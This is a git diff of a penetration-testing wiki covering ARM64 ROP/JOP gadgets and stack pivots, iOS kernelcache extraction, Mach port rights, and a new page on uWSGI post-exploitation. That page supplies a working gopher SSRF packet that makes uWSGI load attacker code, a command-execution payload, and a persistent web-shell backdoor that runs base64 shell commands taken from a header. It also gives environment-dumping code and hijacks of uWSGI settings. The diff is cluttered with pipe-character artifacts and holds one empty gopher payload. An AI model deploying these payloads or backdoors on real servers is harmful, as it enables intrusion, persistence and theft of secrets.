# Use -J if connecting through Corellium via Quick Connect
|
||||
```
|
||||
|
||||
Then, you can use a couple of tools to extract the actual libraries from the dyld_shared_cache_arm64 file:
|
||||
|
||||
- [https://github.com/keith/dyld-shared-cache-extractor](https://github.com/keith/dyld-shared-cache-extractor)
|
||||
- [https://github.com/arandomdev/DyldExtractor](https://github.com/arandomdev/DyldExtractor)
|
||||
|
||||
```bash
|
||||
brew install keith/formulae/dyld-shared-cache-extractor
|
||||
dyld-shared-cache-extractor dyld_shared_cache_arm64 dyld_extracted
|
||||
```
|
||||
|
||||
Now, in order to find interesting gadgets for the binary you are exploiting, you first need to know which libraries are loaded by the binary. You can use **lldb** for this:
|
||||
|
||||
```bash
|
||||
lldb ./vuln
|
||||
br s -n main
|
||||
run
|
||||
image list
|
||||
```
|
||||
|
||||
Finally, you can use [**Ropper**](https://github.com/sashs/ropper) to find gadgets in the libraries you are interested in:
|
||||
|
||||
```bash
|
||||
# Install
|
||||
python3 -m pip install ropper --break-system-packages
|
||||
ropper --file libcache.dylib --search "mov x0"
|
||||
```
|
||||
|
||||
## JOP - Jump Oriented Programming
|
||||
|
||||
JOP is a similar technique to ROP, but instead of ending each gadget with a RET instruction, **each gadget ends with an indirect jump or call** (e.g. `br x2` or `blr x8`). This can be particularly useful in situations where ROP is not feasible, such as when there are no suitable RET-ending gadgets available, which is common on **ARM** architectures.
|
||||
|
||||
You can also use ROP tools (like **Ropper**) to find JOP gadgets, for example:
|
||||
|
||||
```bash
|
||||
cd usr/lib/system # (macOS or iOS) Let's check in these libs inside the dyld_shared_cache_arm64
|
||||
ropper --file *.dylib --search "ldr x0, [x0" # Supposing x0 is pointing to the stack or heap and we control some space around there, we could search for Jop gadgets that load from x0
|
||||
```
|
||||
|
||||
Let's see an example:
|
||||
|
||||
- There is a **heap overflow that allows us to overwrite a function pointer** stored in the heap that will be called.
|
||||
- **`x0`** is pointing to the heap where we control some space
|
||||
|
||||
- From the loaded system libraries we find the following gadgets:
|
||||
|
||||
```
|
||||
0x00000001800d1918: ldr x0, [x0, #0x20]; ldr x2, [x0, #0x30]; br x2;
|
||||
0x00000001800e6e58: ldr x0, [x0, #0x20]; ldr x3, [x0, #0x10]; br x3;
|
||||
```
|
||||
|
||||
- We can use the first gadget to load **`x0`** with a pointer to **`/bin/sh`** (stored in the heap) and then load **`x2`** from **`x0 + 0x30`** with the address of **`system`** and jump to it.
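
A possible layout of the controlled heap buffer `x0` points to (a sketch; the offsets follow from the first gadget, while it's an assumption that the overwritten function pointer and the controlled data live in the same buffer):

```
x0 + 0x00: <address of gadget 0x1800d1918>   # overwritten function pointer -> ldr x0,[x0,#0x20]; ldr x2,[x0,#0x30]; br x2
x0 + 0x20: <x0 + 0x40>                       # new x0 = pointer to the "/bin/sh" string
x0 + 0x40: "/bin/sh\0"                       # argument that ends up in x0 for system()
x0 + 0x70: <address of system>               # x2 = [new x0 + 0x30] = [x0 + 0x70]; br x2 calls system("/bin/sh")
```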
|
||||
|
||||
## Stack Pivot
|
||||
|
||||
Stack pivoting is a technique used in exploitation to change the stack pointer (`RSP` in x64, `SP` in ARM64) to point to a controlled area of memory, such as the heap or a buffer on the stack, where the attacker can place their payload (usually a ROP/JOP chain).
|
||||
|
||||
Examples of Stack Pivoting chains:
|
||||
|
||||
- Example with just 1 gadget:

```
mov sp, x0; ldp x29, x30, [sp], #0x10; ret;
```

The `mov sp, x0` instruction sets the stack pointer to the value in `x0`, effectively pivoting the stack to a new location. The subsequent `ldp x29, x30, [sp], #0x10; ret;` instruction loads the frame pointer and return address from the new stack location and returns to the address in `x30`.
|
||||
|
||||
I found this gadget in libunwind.dylib. If `x0` points to heap memory you control, it lets you move the stack pointer into the heap and therefore control the stack:

```
0000001c61a9b9c:
ldr x16, [x0, #0xf8];   // Control x16
ldr x30, [x0, #0x100];  // Control x30
ldp x0, x1, [x0];       // Control x1
mov sp, x16;            // Control sp
ret;                    // ret will jump to x30, which we control

To use this gadget you could place in the heap something like:
<address of x0 to keep x0>   # ldp x0, x1, [x0]
<address of gadget>          # Let's suppose this is the overflowed pointer that allows to call the ROP chain
"A" * 0xe8 (0xf8-16)         # Fill until x0+0xf8
<address of x0+16>           # Let's point SP to x0+16 to control the stack
<next gadget>                # This will go into x30, which will be called with ret (so address of the 2nd gadget)
```
|
||||
|
||||
- Example with multiple gadgets:
|
||||
|
||||
```
|
||||
// G1: Typical PAC epilogue that restores frame and returns
|
||||
// (seen in many leaf/non-leaf functions)
|
||||
G1:
|
||||
ldp x29, x30, [sp], #0x10 // restore FP/LR
|
||||
autiasp // **PAC check on LR**
|
||||
retab // **PAC-aware return**
|
||||
|
||||
// G2: Small helper that (dangerously) moves SP from FP
|
||||
// (appears in some hand-written helpers / stubs; good to grep for)
|
||||
G2:
|
||||
mov sp, x29 // **pivot candidate**
|
||||
ret
|
||||
|
||||
// G3: Reader on the new stack (common prologue/epilogue shape)
|
||||
G3:
|
||||
ldp x0, x1, [sp], #0x10 // consume args from "new" stack
|
||||
ret
|
||||
```
|
||||
|
||||
```
|
||||
G1:
|
||||
stp x8, x1, [sp] // Store at [sp] → value of x8 (attacker controlled) and at [sp+8] → value of x1 (attacker controlled)
|
||||
ldr x8, [x0] // Load x8 with the value at address x0 (controlled by attacker, address of G2)
|
||||
blr x8 // Branch to the address in x8 (controlled by attacker)
|
||||
|
||||
G2:
|
||||
ldp x29, x30, [sp], #0x10 // Loads [sp] (the saved x8) -> x29 and [sp+8] (the saved x1) -> x30. The value in x1 is the address of G3
|
||||
ret
|
||||
G3:
|
||||
mov sp, x29 // Pivot the stack to the address in x29, which was x8 and was controlled by the attacker, possibly pointing to the heap
|
||||
ret
|
||||
```
|
||||
|
||||
|
||||
## Protections Against ROP and JOP
|
||||
|
||||
- [**ASLR**](../common-binary-protections-and-bypasses/aslr/index.html) **&** [**PIE**](../common-binary-protections-and-bypasses/pie/index.html): These protections make it harder to use ROP as the addresses of the gadgets change between executions.
|
||||
- [**Stack Canaries**](../common-binary-protections-and-bypasses/stack-canaries/index.html): In case of a BOF, it's needed to bypass the stored stack canary to overwrite return pointers and abuse a ROP chain
|
||||
@ -195,6 +326,7 @@ rop-syscall-execv/
|
||||
- 64 bit, Pie and nx enabled, no canary, overwrite RIP with a `vsyscall` address with the sole purpose of returning to the next address in the stack, which will be a partial overwrite of the address to get the part of the function that leaks the flag
|
||||
- [https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/](https://8ksec.io/arm64-reversing-and-exploitation-part-4-using-mprotect-to-bypass-nx-protection-8ksec-blogs/)
|
||||
- arm64, no ASLR, ROP gadget to make stack executable and jump to shellcode in stack
|
||||
- [https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-4.html](https://googleprojectzero.blogspot.com/2019/08/in-wild-ios-exploit-chain-4.html)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
|
@ -135,7 +135,6 @@ Also in ARM64 an instruction does what the instruction does (it's not possible t
|
||||
|
||||
Check the example from:
|
||||
|
||||
|
||||
{{#ref}}
|
||||
ret2lib-+-printf-leak-arm64.md
|
||||
{{#endref}}
|
||||
|
@ -29,9 +29,7 @@ clang -o rop-no-aslr rop-no-aslr.c -fno-stack-protector
|
||||
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
|
||||
```
|
||||
|
||||
### Find offset
|
||||
|
||||
### x30 offset
|
||||
### Find offset - x30 offset
|
||||
|
||||
Creating a pattern with **`pattern create 200`**, using it, and checking for the offset with **`pattern search $x30`** we can see that the offset is **`108`** (0x6c).
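
As a sketch of that session (assuming GEF's `pattern` commands in gdb; the offset value is the one found above):

```
gef➤  pattern create 200
gef➤  run                      # feed the generated pattern as the program input
gef➤  pattern search $x30      # reports offset 108 (0x6c) in this case
```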
|
||||
|
||||
|
@ -94,6 +94,8 @@ In my case in macOS I found it in:
|
||||
|
||||
- `/System/Volumes/Preboot/1BAEB4B5-180B-4C46-BD53-51152B7D92DA/boot/DAD35E7BC0CDA79634C20BD1BD80678DFB510B2AAD3D25C1228BB34BCD0A711529D3D571C93E29E1D0C1264750FA043F/System/Library/Caches/com.apple.kernelcaches/kernelcache`
|
||||
|
||||
Find also here the [**kernelcache of version 14 with symbols**](https://x.com/tihmstar/status/1295814618242318337?lang=en).
|
||||
|
||||
#### IMG4
|
||||
|
||||
The IMG4 file format is a container format used by Apple in its iOS and macOS devices for securely **storing and verifying firmware** components (like **kernelcache**). The IMG4 format includes a header and several tags which encapsulate different pieces of data including the actual payload (like a kernel or bootloader), a signature, and a set of manifest properties. The format supports cryptographic verification, allowing the device to confirm the authenticity and integrity of the firmware component before executing it.
|
||||
@ -137,7 +139,24 @@ nm -a ~/Downloads/Sandbox.kext/Contents/MacOS/Sandbox | wc -l
|
||||
|
||||
Sometimes Apple releases **kernelcache** with **symbols**. You can download some firmwares with symbols by following links on those pages. The firmwares will contain the **kernelcache** among other files.
|
||||
|
||||
To **extract** the files start by changing the extension from `.ipsw` to `.zip` and **unzip** it.
|
||||
To **extract** the kernel cache you can do:
|
||||
|
||||
```bash
|
||||
# Install ipsw tool
|
||||
brew install blacktop/tap/ipsw
|
||||
|
||||
# Extract only the kernelcache from the IPSW
|
||||
ipsw extract --kernel /path/to/YourFirmware.ipsw -o out/
|
||||
|
||||
# You should get something like:
|
||||
# out/Firmware/kernelcache.release.iPhoneXX
|
||||
# or an IMG4 payload: out/Firmware/kernelcache.release.iPhoneXX.im4p
|
||||
|
||||
# If you get an IMG4 payload:
|
||||
ipsw img4 im4p extract out/Firmware/kernelcache*.im4p -o kcache.raw
|
||||
```
|
||||
|
||||
Another option to **extract** the files is to change the extension from `.ipsw` to `.zip` and **unzip** it.
|
||||
|
||||
After extracting the firmware you will get a file like **`kernelcache.release.iphone14`**. It's in **IMG4** format; you can extract the interesting info with:
|
||||
|
||||
@ -153,6 +172,16 @@ pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphon
|
||||
img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
|
||||
```
|
||||
|
||||
```bash
|
||||
pyimg4 im4p extract -i kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
|
||||
```
|
||||
|
||||
[**img4tool**](https://github.com/tihmstar/img4tool)**:**
|
||||
|
||||
```bash
|
||||
img4tool -e kernelcache.release.iphone14 -o kernelcache.release.iphone14.e
|
||||
```
|
||||
|
||||
### Inspecting kernelcache
|
||||
|
||||
Check if the kernelcache has symbols with
|
||||
|
@ -22,7 +22,7 @@ Port rights, which define what operations a task can perform, are key to this co
|
||||
|
||||
- **Receive right**, which allows receiving messages sent to the port. Mach ports are MPSC (multiple-producer, single-consumer) queues, which means that there may only ever be **one receive right for each port** in the whole system (unlike with pipes, where multiple processes can all hold file descriptors to the read end of one pipe).
|
||||
- A **task with the Receive** right can receive messages and **create Send rights**, allowing it to send messages. Originally only the **owning task has the Receive right over its port**.
|
||||
- If the owner of the Receive right **dies** or kills it, the **send right became useless (dead name).**
|
||||
- If the owner of the Receive right **dies** or kills it, the **send right becomes useless (dead name).**
|
||||
- **Send right**, which allows sending messages to the port.
|
||||
- The Send right can be **cloned** so a task owning a Send right can clone the right and **grant it to a third task**.
|
||||
- Note that **port rights** can also be **passed** through Mach messages.
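
A minimal user-space sketch of these rights using the standard Mach APIs (error handling trimmed):

```c
#include <mach/mach.h>
#include <stdio.h>

int main(void) {
    mach_port_t port = MACH_PORT_NULL;

    // Allocate a new port: the calling task gets the (single) Receive right
    kern_return_t kr = mach_port_allocate(mach_task_self(), MACH_PORT_RIGHT_RECEIVE, &port);
    if (kr != KERN_SUCCESS) { fprintf(stderr, "allocate failed: 0x%x\n", kr); return 1; }

    // Derive a Send right from the Receive right; this is what you would hand
    // to other tasks (e.g. inside a Mach message) so they can send to the port
    kr = mach_port_insert_right(mach_task_self(), port, port, MACH_MSG_TYPE_MAKE_SEND);
    printf("port 0x%x, insert_right -> 0x%x\n", port, kr);
    return 0;
}
```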
|
||||
|
src/network-services-pentesting/pentesting-web/wsgi.md (new file, 179 lines)
@ -0,0 +1,179 @@
|
||||
# WSGI Post-Exploitation Tricks
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
||||
|
||||
## WSGI Overview
|
||||
|
||||
Web Server Gateway Interface (WSGI) is a specification that describes how a web server communicates with web applications, and how web applications can be chained together to process one request. uWSGI is one of the most popular WSGI servers, often used to serve Python web applications.
|
||||
|
||||
## uWSGI Magic Variables Exploitation
|
||||
|
||||
uWSGI provides special "magic variables" that can be used to dynamically configure the server behavior. These variables can be set through HTTP headers and may lead to serious security vulnerabilities when not properly validated.
|
||||
|
||||
### Key Exploitable Variables
|
||||
|
||||
#### `UWSGI_FILE` - Arbitrary File Execution
|
||||
|
||||
```
|
||||
uwsgi_param UWSGI_FILE /path/to/python/file.py;
|
||||
```
|
||||
This variable allows loading and executing arbitrary Python files as WSGI applications. If an attacker can control this parameter, they can achieve Remote Code Execution (RCE).
|
||||
|
||||
#### `UWSGI_SCRIPT` - Script Loading
|
||||
```
|
||||
uwsgi_param UWSGI_SCRIPT module.path:callable;
|
||||
uwsgi_param SCRIPT_NAME /endpoint;
|
||||
```
|
||||
Loads a specified script as a new application. Combined with file upload or write capabilities, this can lead to RCE.
|
||||
|
||||
#### `UWSGI_MODULE` and `UWSGI_CALLABLE` - Dynamic Module Loading
|
||||
```
|
||||
uwsgi_param UWSGI_MODULE malicious.module;
|
||||
uwsgi_param UWSGI_CALLABLE evil_function;
|
||||
uwsgi_param SCRIPT_NAME /backdoor;
|
||||
```
|
||||
These parameters allow loading arbitrary Python modules and calling specific functions within them.
|
||||
|
||||
#### `UWSGI_SETENV` - Environment Variable Manipulation
|
||||
```
|
||||
uwsgi_param UWSGI_SETENV DJANGO_SETTINGS_MODULE=malicious.settings;
|
||||
```
|
||||
Can be used to modify environment variables, potentially affecting application behavior or loading malicious configuration.
|
||||
|
||||
#### `UWSGI_PYHOME` - Python Environment Manipulation
|
||||
```
|
||||
uwsgi_param UWSGI_PYHOME /path/to/malicious/venv;
|
||||
```
|
||||
Changes the Python virtual environment, potentially loading malicious packages or different Python interpreters.
|
||||
|
||||
#### `UWSGI_CHDIR` - Directory Traversal
|
||||
```
|
||||
uwsgi_param UWSGI_CHDIR /etc/;
|
||||
```
|
||||
Changes the working directory before processing requests, which can be used for path traversal attacks.
|
||||
|
||||
## SSRF + Gopher to uWSGI
|
||||
|
||||
### The Attack Vector
|
||||
|
||||
When uWSGI is accessible through SSRF (Server-Side Request Forgery), attackers can interact with the internal uWSGI socket to exploit magic variables. This is particularly dangerous when:
|
||||
|
||||
1. The application has SSRF vulnerabilities
|
||||
2. uWSGI is running on an internal port/socket
|
||||
3. The application doesn't properly validate magic variables
|
||||
|
||||
uWSGI is reachable through the SSRF because the config file `uwsgi.ini` contains `socket = 127.0.0.1:5000`, exposing the binary uWSGI protocol on a local TCP port that the vulnerable web application can reach.
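
For reference, such a setup could look like this (an assumed `uwsgi.ini`, not taken from a specific target):

```
[uwsgi]
; binary uwsgi protocol reachable on localhost (and thus via the SSRF)
socket = 127.0.0.1:5000
chdir = /app
wsgi-file = /app/app.py
callable = app
```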
|
||||
|
||||
### Exploitation Example
|
||||
|
||||
#### Step 1: Create Malicious Payload
|
||||
First, inject Python code into a file accessible by the server (this requires a file-write primitive on the server; the file extension doesn't matter):
|
||||
```python
|
||||
# Payload injected into a JSON profile file
|
||||
import os
|
||||
os.system("/readflag > /app/profiles/result.json")
|
||||
```
|
||||
|
||||
#### Step 2: Craft uWSGI Protocol Request
|
||||
Use Gopher protocol to send raw uWSGI packets:
|
||||
```
|
||||
gopher://127.0.0.1:5000/_%00%D2%00%00%0F%00SERVER_PROTOCOL%08%00HTTP/1.1%0E%00REQUEST_METHOD%03%00GET%09%00PATH_INFO%01%00/%0B%00REQUEST_URI%01%00/%0C%00QUERY_STRING%00%00%0B%00SERVER_NAME%00%00%09%00HTTP_HOST%0E%00127.0.0.1%3A5000%0A%00UWSGI_FILE%1D%00/app/profiles/malicious.json%0B%00SCRIPT_NAME%10%00/malicious.json
|
||||
```
|
||||
|
||||
This payload:
|
||||
- Connects to uWSGI on port 5000
|
||||
- Sets `UWSGI_FILE` to point to the malicious file
|
||||
- Forces uWSGI to load and execute the Python code
|
||||
|
||||
### uWSGI Protocol Structure
|
||||
|
||||
The uWSGI protocol uses a binary format where:
|
||||
- Variables are encoded as length-prefixed strings
|
||||
- Each variable is encoded as `[name_length (uint16 LE)][name][value_length (uint16 LE)][value]`
- The packet starts with a 4-byte header: `modifier1` (1 byte), the total body size as a little-endian uint16, and `modifier2` (1 byte)
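
A minimal sketch of building such a packet in Python (the variables mirror the gopher payload above; `uwsgi_packet` is a hypothetical helper name):

```python
import struct

def uwsgi_packet(variables: dict) -> bytes:
    body = b""
    for name, value in variables.items():
        n, v = name.encode(), value.encode()
        body += struct.pack("<H", len(n)) + n + struct.pack("<H", len(v)) + v
    # Header: modifier1 (0 = WSGI request), body size as little-endian uint16, modifier2
    return struct.pack("<BHB", 0, len(body), 0) + body

pkt = uwsgi_packet({
    "SERVER_PROTOCOL": "HTTP/1.1",
    "REQUEST_METHOD": "GET",
    "PATH_INFO": "/",
    "REQUEST_URI": "/",
    "QUERY_STRING": "",
    "SERVER_NAME": "",
    "HTTP_HOST": "127.0.0.1:5000",
    "UWSGI_FILE": "/app/profiles/malicious.json",
    "SCRIPT_NAME": "/malicious.json",
})
# URL-encode every byte and append it to "gopher://127.0.0.1:5000/_" for the SSRF
print("gopher://127.0.0.1:5000/_" + "".join(f"%{b:02X}" for b in pkt))
```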
|
||||
|
||||
## Post-Exploitation Techniques
|
||||
|
||||
### 1. Persistent Backdoors
|
||||
|
||||
#### File-based Backdoor
|
||||
```python
|
||||
# backdoor.py
|
||||
import subprocess
|
||||
import base64
|
||||
|
||||
def application(environ, start_response):
|
||||
cmd = environ.get('HTTP_X_CMD', '')
|
||||
if cmd:
|
||||
result = subprocess.run(base64.b64decode(cmd), shell=True, capture_output=True, text=True)
|
||||
response = f"STDOUT: {result.stdout}\nSTDERR: {result.stderr}"
|
||||
else:
|
||||
response = "Backdoor active"
|
||||
|
||||
start_response('200 OK', [('Content-Type', 'text/plain')])
|
||||
return [response.encode()]
|
||||
```
|
||||
|
||||
Then use `UWSGI_FILE` to load this backdoor:
|
||||
```
|
||||
uwsgi_param UWSGI_FILE /tmp/backdoor.py;
|
||||
uwsgi_param SCRIPT_NAME /admin;
|
||||
```
|
||||
|
||||
#### Environment-based Persistence
|
||||
```
|
||||
uwsgi_param UWSGI_SETENV PYTHONPATH=/tmp/malicious:/usr/lib/python3.8/site-packages;
|
||||
```
|
||||
|
||||
### 2. Information Disclosure
|
||||
|
||||
#### Environment Variable Dumping
|
||||
```python
|
||||
# env_dump.py
|
||||
import os
|
||||
import json
|
||||
|
||||
def application(environ, start_response):
|
||||
env_data = {
|
||||
'os_environ': dict(os.environ),
|
||||
'wsgi_environ': dict(environ)
|
||||
}
|
||||
|
||||
start_response('200 OK', [('Content-Type', 'application/json')])
|
||||
return [json.dumps(env_data, indent=2).encode()]
|
||||
```
|
||||
|
||||
#### File System Access
|
||||
Use `UWSGI_CHDIR` combined with file serving to access sensitive files:
|
||||
```
|
||||
uwsgi_param UWSGI_CHDIR /etc/;
|
||||
uwsgi_param UWSGI_FILE /app/file_server.py;
|
||||
```
|
||||
|
||||
### 3. Privilege Escalation
|
||||
|
||||
#### Socket Manipulation
|
||||
If uWSGI runs with elevated privileges, attackers might manipulate socket permissions:
|
||||
```
|
||||
uwsgi_param UWSGI_CHDIR /tmp;
|
||||
uwsgi_param UWSGI_SETENV UWSGI_SOCKET_OWNER=www-data;
|
||||
```
|
||||
|
||||
#### Configuration Override
|
||||
```python
|
||||
# malicious_config.py
|
||||
import os
|
||||
|
||||
# Override uWSGI configuration
|
||||
os.environ['UWSGI_MASTER'] = '1'
|
||||
os.environ['UWSGI_PROCESSES'] = '1'
|
||||
os.environ['UWSGI_CHEAPER'] = '1'
|
||||
```
|
||||
|
||||
## References
|
||||
|
||||
- [uWSGI Magic Variables Documentation](https://uwsgi-docs.readthedocs.io/en/latest/Vars.html)
|
||||
- [IOI SaveData CTF Writeup](https://bugculture.io/writeups/web/ioi-savedata)
|
||||
- [uWSGI Security Best Practices](https://uwsgi-docs.readthedocs.io/en/latest/Security.html)
|
||||
|
||||
{{#include ../../banners/hacktricks-training.md}}
|
@ -54,11 +54,11 @@ Some examples from [**this post**](https://www.certik.com/resources/blog/web2-me
|
||||
|
||||
### Wasting Funds: Forcing backend to perform transactions
|
||||
|
||||
In the scenario **`Wasted Crypto in Gas via Unrestricted API`**, the attacke can force the backend to call functions of a smart contract that will consume gas. The attacker, just sending an ETH account number and with no limits, will force backend to call the smart contrat to register it, which will consume gas.
|
||||
In the scenario **`Wasted Crypto in Gas via Unrestricted API`**, the attacker can force the backend to call functions of a smart contract that will consume gas. The attacker, just sending an ETH account number and with no limits, will force backend to call the smart contract to register it, which will consume gas.
|
||||
|
||||
### DoS: Poor transaction handling time
|
||||
|
||||
In the scenario **`Poor Transaction Time Handling Leads to DoS`**, is explained that because the backend will the HTTP request open until a transaction is performed, a user can easly send several HTTP requests to the backend, which will consume all the resources of the backend and will lead to a DoS.
|
||||
In the scenario **`Poor Transaction Time Handling Leads to DoS`**, it is explained that because the backend keeps the HTTP request open until a transaction is performed, a user can easily send several HTTP requests to the backend, which will consume all the resources of the backend and lead to a DoS.
|
||||
|
||||
### Backend<-->Blockchain desync - Race condition
|
||||
|
||||
|
@ -90,6 +90,14 @@ Payloads example:
|
||||
</div>
|
||||
```
|
||||
|
||||
### Gopher
|
||||
|
||||
Use gopher to send arbitrary requests to internal services with arbitrary data:
|
||||
|
||||
```
|
||||

|
||||
```
|
||||
|
||||
### Fuzzing
|
||||
|
||||
```html
|
||||
|